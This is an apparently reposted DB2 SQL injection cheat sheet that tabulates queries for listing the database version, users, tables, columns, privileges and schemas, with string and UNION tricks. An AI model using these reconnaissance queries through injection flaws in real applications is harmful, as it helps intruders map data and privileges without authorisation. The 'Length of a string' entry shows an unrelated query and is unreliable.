DB2 SQL Injection Cheat Sheet

chenqb

Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience.  When you do find one, though it pays to be prepared...
　　Below are some tabulated notes on how to do many of thing you'd normally do via SQL injection.  All tests were performed on DB2 8.2 under Windows.

Description	SQL / Comments
Comments	select blah from foo; -- comment like this
Batching Queries Allowed?	???
Database Version	select versionnumber, version_timestamp from sysibm.sysversions;
Current Database User	select user from sysibm.sysdummy1; select session_user from sysibm.sysdummy1;
System User for Current Connection	select system_user from sysibm.sysdummy1;
Current Database	select current server from sysibm.sysdummy1;
Limiting Rows Returned	SELECT foo FROM bar fetch first 1 rows only;
Returning N Rows starting at Offset M	select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
List Tables	select name from sysibm.systables;
List Columns	select name, tbname, coltype from sysibm.syscolumns;
List Databse Users and Passwords	Database authorities (like roles, I think) can be listed like this: select grantee from syscat.dbauth;
FROM clause mandated in SELECTs?	Yes, use sysibm.sysdummy1: select 123 from sysibm.sysdummy1;
UNION supported	Yes select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
Enumerate Tables Privs	select * from syscat.tabauth;
Enumerate Current Privs	select * from syscat.dbauth where grantee = current user; select * from syscat.tabauth where grantee = current user;
Length of a string	select name, tbname, coltype from sysibm.syscolumns; -- returns 3
Bitwise AND	This page seems to indicate that DB2 has no support for bitwise operators!
Substring	SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1;  -- returns b
ASCII value of a character	select ascii('A') from sysibm.sysdummy1; -- returns 65
Character from ASCII value	select chr(65) from sysibm.sysdummy1; -- returns 'A'
Roles and passwords	N/A (I think DB2 uses OS-level user accounts for authentication.)
List Database Procedures	???
Create Users + Granting Privs	???
Time Delays	???
Execute OS Commands	???
Write to File System	???
Concatenation	SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc' select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
Casting	SELECT cast('123' as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemas	SELECT schemaname FROM syscat.schemata;

　　This page will probably remain a work-in-progress for some time yet.  I'll update it as I learn more.